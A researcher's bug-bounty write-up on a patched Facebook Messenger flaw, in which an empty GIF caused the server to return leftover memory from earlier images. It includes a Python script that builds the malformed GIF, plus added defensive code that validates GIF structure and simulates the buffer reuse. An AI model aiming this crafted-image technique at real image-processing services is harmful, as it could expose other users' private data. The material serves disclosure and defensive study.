Facebook Messenger server random memory exposure through corrupted GIF image

Intro

A year ago, in February 2018, I was testing Facebook Messenger for Android to see how it handles corrupted GIF images. I was inspired by the ImageMagick "uninitialized memory disclosure in GIF coder" bug and the PoC called "gifoeb" (a cool name for Russian speakers). I found that the Messenger app only crashed on images generated by the "gifoeb" tool, with a null pointer dereference (Facebook didn't award a bounty for DoS in Facebook Messenger for Android).
OK, I thought: what is the GIF image format, what does it look like, and how can I generate my own image?
(Spoiler: a $10K bug in Facebook Messenger for Web, but theory first.)

Basic GIF image

I found a clear description of the GIF image format; the main header should look like this:


Offset   Length   Contents
  0      3 bytes  "GIF"
  3      3 bytes  "87a" or "89a"
  6      2 bytes  <Logical Screen Width>
  8      2 bytes  <Logical Screen Height>
 10      1 byte   bit 0:    Global Color Table Flag (GCTF)
                  bit 1..3: Color Resolution
                  bit 4:    Sort Flag to Global Color Table
                  bit 5..7: Size of Global Color Table: 2^(1+n)
 11      1 byte   <Background Color Index>
 12      1 byte   <Pixel Aspect Ratio>
 13      ? bytes  <Global Color Table(0..255 x 3 bytes) if GCTF is one>
         ? bytes  <Blocks>
         1 bytes  <Trailer> (0x3b)

(Full description here: http://www.onicos.com/staff/iz/formats/gif.html#header)
Note that this description numbers bits from the most significant end, so "bit 0" of the packed byte at offset 10 is its high bit (0x80): the Global Color Table Flag is the top bit and the table size is in the low three bits.
I decided to create a basic GIF file with only the minimal required fields.

Making own GIF

To create my own GIF I used Python to generate the binary file:


import struct

screenWidth = 640
screenHeight = 480

with open('test.gif', 'wb') as f:

    # Offset   Length   Contents
    #   0      3 bytes  "GIF"
    #   3      3 bytes  "87a" or "89a"
    f.write(b"GIF89a")

    #   6      2 bytes  <Logical Screen Width>  (little-endian, unsigned)
    f.write(struct.pack('<H', screenWidth))

    #   8      2 bytes  <Logical Screen Height>
    f.write(struct.pack('<H', screenHeight))

    #  10      1 byte   bit 0:    Global Color Table Flag (GCTF)
    #                   bit 1..3: Color Resolution
    #                   bit 4:    Sort Flag to Global Color Table
    #                   bit 5..7: Size of Global Color Table: 2^(1+n)
    # (bits are counted from the most significant end, so GCTF is 0x80)
    # GCTF = 0: no global color table follows
    bits = int('00000010', 2)
    f.write(struct.pack('<B', bits))

    #  11      1 byte   <Background Color Index>
    f.write(struct.pack('<B', 0))

    #  12      1 byte   <Pixel Aspect Ratio>
    f.write(struct.pack('<B', 1))

    #  13      ? bytes  <Global Color Table(0..255 x 3 bytes) if GCTF is one>
    # (skipped: GCTF is zero)

    #          ? bytes  <Blocks>

    # Image Descriptor
    # Offset   Length   Contents
    #   0      1 byte   Image Separator (0x2c)
    f.write(struct.pack('<B', 0x2c))

    #   1      2 bytes  Image Left Position
    f.write(struct.pack('<H', 0))

    #   3      2 bytes  Image Top Position
    f.write(struct.pack('<H', 0))

    #   5      2 bytes  Image Width
    f.write(struct.pack('<H', screenWidth))

    #   7      2 bytes  Image Height
    f.write(struct.pack('<H', screenHeight))

    #   9      1 byte   bit 0:    Local Color Table Flag (LCTF)
    #                   bit 1:    Interlace Flag
    #                   bit 2:    Sort Flag
    #                   bit 3..4: Reserved
    #                   bit 5..7: Size of Local Color Table: 2^(1+n)
    #          ? bytes  Local Color Table(0..255 x 3 bytes) if LCTF is one
    # LCTF = 0: no local color table follows
    f.write(struct.pack('<B', int('00000100', 2)))

    # Image Data (deliberately omitted: the decoder gets a 640x480
    # descriptor with nothing to decode)
    #          1 byte   LZW Minimum Code Size
    #f.write(struct.pack('<B', 1))

    # [ // Blocks
    #          1 byte   Block Size (s)
    #f.write(struct.pack('<B', 1))

    #         (s)bytes  Image Data
    # ]*
    #          1 byte   Block Terminator(0x00)
    #f.write(struct.pack('<B', 0))

    #          1 byte   <Trailer> (0x3b)
    f.write(struct.pack('<B', 0x3b))

This script generates exactly the image we need. I left the comments in place to show which headers are skipped; you can see that our GIF has no image data blocks at all, it is empty: right after the image descriptor's packed flags byte comes the trailer.
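The check a decoder should have made on that file is the one an uploaded-image pipeline needs before it ever allocates an output buffer. The following walker is an added example for this page, not code from the original post: it walks the GIF block structure described in the table above and rejects an image descriptor that is not followed by LZW image data. The two sample inputs are constructed here: ONE_PIXEL_GIF is the well-known 43-byte 1x1 GIF, and empty_gif() reconstructs (by assumption, from reading the script) the bytes the script above writes.

```python
import struct

# Constructed sample: the common 43-byte 1x1 GIF, annotated block by block.
ONE_PIXEL_GIF = bytes.fromhex(
    "474946383961"          # "GIF89a"
    "01000100" "800000"     # 1x1 screen; packed 0x80 = GCTF set, 2-entry table
    "000000ffffff"          # global color table: black, white
    "21f9040100000000"      # graphic control extension: 4 data bytes + terminator
    "2c000000000100010000"  # image descriptor: 1x1 at (0,0), no local table
    "0202440100"            # LZW min code size 2, one 2-byte sub-block, terminator
    "3b"                    # trailer
)


def empty_gif(width=640, height=480):
    """Rebuild the 24-byte file the generator script writes (assumption:
    header, image descriptor with LCTF clear, then the trailer, no image data)."""
    return (b"GIF89a" + struct.pack("<HHBBB", width, height, 0x02, 0, 1)
            + b"\x2c" + struct.pack("<HHHHB", 0, 0, width, height, 0x04)
            + b"\x3b")


def _sub_blocks(data, pos):
    """Consume a chain of data sub-blocks ending in a 0x00 terminator.
    Returns (position after the terminator, total payload bytes)."""
    total = 0
    while True:
        if pos >= len(data):
            raise ValueError(f"sub-block chain runs past end of file at {pos}")
        size = data[pos]
        pos += 1
        if size == 0:
            return pos, total
        total += size
        pos += size


def walk_gif(data):
    """Walk a GIF's block structure and return a list of (kind, info) tuples.

    Raises ValueError on structural defects a decoder must not paper over,
    in particular an image descriptor that is not followed by LZW image data.
    """
    if len(data) < 13 or data[:3] != b"GIF" or data[3:6] not in (b"87a", b"89a"):
        raise ValueError("not a GIF87a/GIF89a header")
    width, height, packed, _bg, _aspect = struct.unpack_from("<HHBBB", data, 6)
    blocks = [("header", {"version": data[3:6].decode("ascii"),
                          "width": width, "height": height})]
    pos = 13
    if packed & 0x80:                      # GCTF is the most significant bit
        entries = 2 << (packed & 0x07)     # 2^(1+n), n in the low three bits
        blocks.append(("global_color_table", {"entries": entries}))
        pos += 3 * entries
    while pos < len(data):
        tag = data[pos]
        pos += 1
        if tag == 0x3B:
            blocks.append(("trailer", {}))
            return blocks
        if tag == 0x21:                    # extension: label byte + sub-blocks
            label = data[pos]
            pos, payload = _sub_blocks(data, pos + 1)
            blocks.append(("extension", {"label": label, "bytes": payload}))
        elif tag == 0x2C:                  # image descriptor
            left, top, w, h, lpacked = struct.unpack_from("<HHHHB", data, pos)
            pos += 9
            if lpacked & 0x80:             # local color table present
                pos += 3 * (2 << (lpacked & 0x07))
            if pos >= len(data):
                raise ValueError("image descriptor runs past end of file")
            min_code = data[pos]
            # The LZW minimum code size is the pixel depth, at most 8 in GIF.
            # In the generated file this byte is already the trailer, 0x3B.
            if min_code > 8:
                raise ValueError(
                    f"image descriptor at {pos - 10} has no LZW image data "
                    f"(byte 0x{min_code:02x} where the minimum code size belongs)")
            pos, payload = _sub_blocks(data, pos + 1)
            if payload == 0:
                raise ValueError(f"image ending at {pos} has zero data bytes")
            blocks.append(("image", {"left": left, "top": top, "width": w,
                                     "height": h, "data_bytes": payload}))
        else:
            raise ValueError(f"unknown block introducer 0x{tag:02x} at {pos - 1}")
    raise ValueError("missing trailer")


def validate(data):
    """Return None if the GIF walks cleanly, otherwise the problem as a string."""
    try:
        walk_gif(data)
    except ValueError as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    for name, gif in (("1x1", ONE_PIXEL_GIF), ("empty 640x480", empty_gif())):
        print(name, "->", validate(gif) or "ok")
```

The walker deliberately stops short of LZW decoding: even without it, the structure alone tells you the generated file promises 640x480 pixels and supplies none, which is exactly the input the Messenger pipeline should have refused rather than rendered.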

Facebook Messenger 

I started testing Facebook Messenger for Android with my generated GIFs (I had variations with different sizes and header fields), but nothing happened... until I opened the Messenger web page on my laptop and saw this weird image:

[Image: the returned picture, enlarged because the original was very small]

Wait, but our GIF doesn't have any content, so what image did I get back from Facebook?
I changed the GIF size and saw this white-noise image, which also looks weird:

[Image: no TV signal]

Really strange. I uploaded the same binary again and saw:

[Image: an embedded TV screen in Messenger]

The image changed a bit, but I uploaded the same GIF in both cases.
After playing with the GIF screen/image sizes:

[Image: full-screen picture]

This reminds me of the situation when you read an image from a file and use the width instead of the height.
Finally I caught this output:

[Image: semi-stable TV signal caught in Messenger]

And I realized that I was getting some previous buffer as my GIF image, because my image doesn't have a content body.
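What the pictures above are consistent with is a decoder that sizes its output from the image descriptor (width x height) but only overwrites as many pixels as the LZW stream actually yields; with no stream at all, the caller receives whatever the buffer held before. The following simulation is an added example for this page and not code from the post or from Facebook, whose server-side cause was never published: it models that inference with a toy decoder that recycles one scratch buffer across requests, and places the unchecked version beside the one that refuses to render an image whose data does not cover every promised pixel. SECRET_W, SECRET_H and the "previous upload" bytes are constructed inputs.

```python
SECRET_W, SECRET_H = 4, 2   # constructed dimensions of the 'earlier upload'


class ReusedBufferDecoder:
    """Toy decoder that recycles one scratch buffer across requests, the way a
    pooled allocator or a long-lived worker might. Whatever the previous image
    left behind stays there until something overwrites it."""

    def __init__(self, capacity):
        self.scratch = bytearray(capacity)

    def decode(self, width, height, indices):
        """'indices' stands in for the LZW-decoded pixel index stream.

        A GIF with no image data decodes to zero pixels, so nothing is written,
        but the caller is still handed width*height bytes of the buffer."""
        n = width * height
        if n > len(self.scratch):
            raise ValueError("image larger than scratch buffer")
        self.scratch[:len(indices)] = indices
        return bytes(self.scratch[:n])


class CheckedDecoder(ReusedBufferDecoder):
    """Same buffer reuse, but output is released only once the decoded data
    covers every pixel the descriptor promised."""

    def decode(self, width, height, indices):
        n = width * height
        if len(indices) < n:
            raise ValueError(
                f"image data covers {len(indices)} of {n} pixels; refusing to render")
        return super().decode(width, height, indices[:n])


def leak_demo():
    """Decode a normal image, then the empty GIF's zero-pixel stream.

    Returns (previous_image, leaked_bytes, checked_error): leaked_bytes is what
    the unchecked decoder hands back for the empty GIF, checked_error the
    message the checked decoder raises for the same input."""
    previous = bytes(range(1, SECRET_W * SECRET_H + 1))   # constructed earlier upload
    leaky = ReusedBufferDecoder(64)
    leaky.decode(SECRET_W, SECRET_H, previous)
    leaked = leaky.decode(SECRET_W, SECRET_H, b"")        # empty GIF: nothing written

    checked = CheckedDecoder(64)
    checked.decode(SECRET_W, SECRET_H, previous)
    try:
        checked.decode(SECRET_W, SECRET_H, b"")
        error = None
    except ValueError as exc:
        error = str(exc)
    return previous, leaked, error


if __name__ == "__main__":
    previous, leaked, error = leak_demo()
    print("previous upload :", previous.hex())
    print("unchecked output:", leaked.hex())
    print("checked decoder :", error)
```

Rejecting the image is the stricter fix; a decoder that must still produce output for malformed files should instead clear the buffer (or fill it with the background color index) before decoding, so that a short stream yields a blank region rather than a stranger's pixels. Changing the descriptor's width and height changes which slice of the buffer comes back, which matches the author's observation that different sizes produced different pictures.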

Timeline

26 FEB 2018: report sent to Facebook Team
01 MAR 2018: triaged
09 MAR 2018: fixed
21 MAR 2018: $10K bounty

Comments

  1. If you could read arbitrary memory that contains secrets, that'd be a bad vulnerability.

  2. How do you report a bug to Facebook in the Whitehat program?

  3. Hi, great job.
     As you are a researcher, if you don't mind, can I ask you a question?

     I found a sensitive bug in WhatsApp in Feb 2015 which allowed me to reopen a WhatsApp account without OTP verification. At that time I was unaware of the FB bounty program, so I informed WhatsApp directly through the CONTACT US email (I still have a copy of the emails). I explained to them in detail how to reproduce the bug. I did get a reply that "there is no bug", but after a month WhatsApp released a global update and removed the bug I had found, and I was like lol.
